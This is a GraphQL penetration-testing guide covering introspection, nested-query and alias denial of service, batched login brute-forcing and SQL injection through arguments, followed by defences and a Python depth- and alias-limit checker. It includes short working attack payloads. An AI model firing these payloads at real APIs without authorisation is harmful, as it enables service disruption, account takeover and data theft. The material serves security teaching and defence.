GraphQL Pentesting
GraphQL APIs offer flexibility but introduce unique attack vectors like introspection abuse, nested query DoS, and batching attacks.
Introspection & Enumeration
Introspection allows you to query the API for its schema.
Check Introspection
Send a query to check if introspection is enabled.
POST /graphql
Content-Type: application/json
{
  "query": "{ __schema { types { name } } }"
}
Get Full Schema
Use tools like gq or InQL to retrieve the full schema.
gq https://api.target.com/graphql --introspect
Manual Enumeration
If you can't get the full schema, try listing types, queries, and mutations manually.
List all types:
{
  __schema {
    types {
      name
      kind
    }
  }
}
List all queries:
{
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}
List all mutations:
{
  __schema {
    mutationType {
      fields {
        name
        description
      }
    }
  }
}
GraphQL Specific Attacks
Nested Query DoS
Send deeply nested queries to exhaust server resources (circular queries, possible when the schema links types back to each other, e.g. user -> posts -> comments -> author -> posts).
query {
  user(id: 1) {
    posts {
      comments {
        author {
          posts {
            comments {
              author {
                # ... repeat ...
              }
            }
          }
        }
      }
    }
  }
}
Batching Attacks
Send multiple queries in a single request to bypass rate limits or brute force credentials.
[
  { "query": "query { login(u: \"admin\", p: \"123456\") { token } }" },
  { "query": "query { login(u: \"admin\", p: \"password\") { token } }" },
  { "query": "query { login(u: \"admin\", p: \"12345678\") { token } }" }
]
Alias Overloading
Request the same field multiple times with aliases to cause resource exhaustion.
query {
  user1: user(id: 1) { email }
  user2: user(id: 2) { email }
  user3: user(id: 3) { email }
}
Injection
SQL or NoSQL injection can occur within GraphQL arguments when resolvers pass them unsanitised into database queries.
query {
  user(id: "1' OR 1=1--") {
    username
  }
}
Remediation
Defense Strategies
- Disable Introspection in production environments.
- Implement Query Depth Limiting (e.g., max depth 5).
- Implement Query Complexity Analysis (cost-based limiting).
- Disable or limit batching functionality.
- Validate all arguments and inputs (treat them as untrusted).
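As an added, defender-side illustration of the depth-limiting and alias-limiting controls above (not code from the original page, and not any particular GraphQL library's validation rule), this Python sketch measures a query's nesting depth and alias count with a small brace-and-token scan and reports which limits it breaks. The two sample queries are constructed to mirror the nested and aliased queries shown earlier and use a hypothetical schema.

```python
import re

# Constructed samples modelled on the nested and aliased queries above (hypothetical schema).
NESTED_QUERY = """query { user(id: 1) { posts { comments { author {
  posts { comments { author { id } } } } } } } }"""

ALIASED_QUERY = """query {
  user1: user(id: 1) { email }
  user2: user(id: 2) { email }
  user3: user(id: 3) { email } }"""

def _strip_strings_and_comments(query: str) -> str:
    # Blank out string literals and # comments so braces or colons inside them are not counted.
    query = re.sub(r'"(?:\\.|[^"\\])*"', '""', query)
    return re.sub(r"#[^\n]*", "", query)

def analyze_query(query: str) -> dict:
    """Return the selection-set nesting depth (root operation included) and the alias count."""
    src = _strip_strings_and_comments(query)
    depth = max_depth = paren = 0
    for ch in src:
        if ch == "(":
            paren += 1
        elif ch == ")":
            paren -= 1
        elif ch == "{" and paren == 0:  # braces inside argument lists are object literals, not selection sets
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}" and paren == 0:
            depth -= 1
    # An alias is `name:` outside argument parentheses, so drop parenthesised text before counting.
    outside_args = re.sub(r"\([^()]*\)", "", src)
    aliases = len(re.findall(r"\b[A-Za-z_]\w*\s*:", outside_args))
    return {"depth": max_depth, "aliases": aliases}

def check_limits(query: str, max_depth: int = 5, max_aliases: int = 10) -> list:
    """List the limit violations a server-side validation rule would reject this query for."""
    stats = analyze_query(query)
    violations = []
    if stats["depth"] > max_depth:
        violations.append(f"depth {stats['depth']} exceeds {max_depth}")
    if stats["aliases"] > max_aliases:
        violations.append(f"{stats['aliases']} aliases exceed {max_aliases}")
    return violations

if __name__ == "__main__":
    for name, q in (("nested", NESTED_QUERY), ("aliased", ALIASED_QUERY)):
        print(name, analyze_query(q), check_limits(q, max_aliases=2))
```

A production deployment would run the same checks as a validation rule before execution, alongside a cost-based complexity budget, rather than as a post-hoc scan.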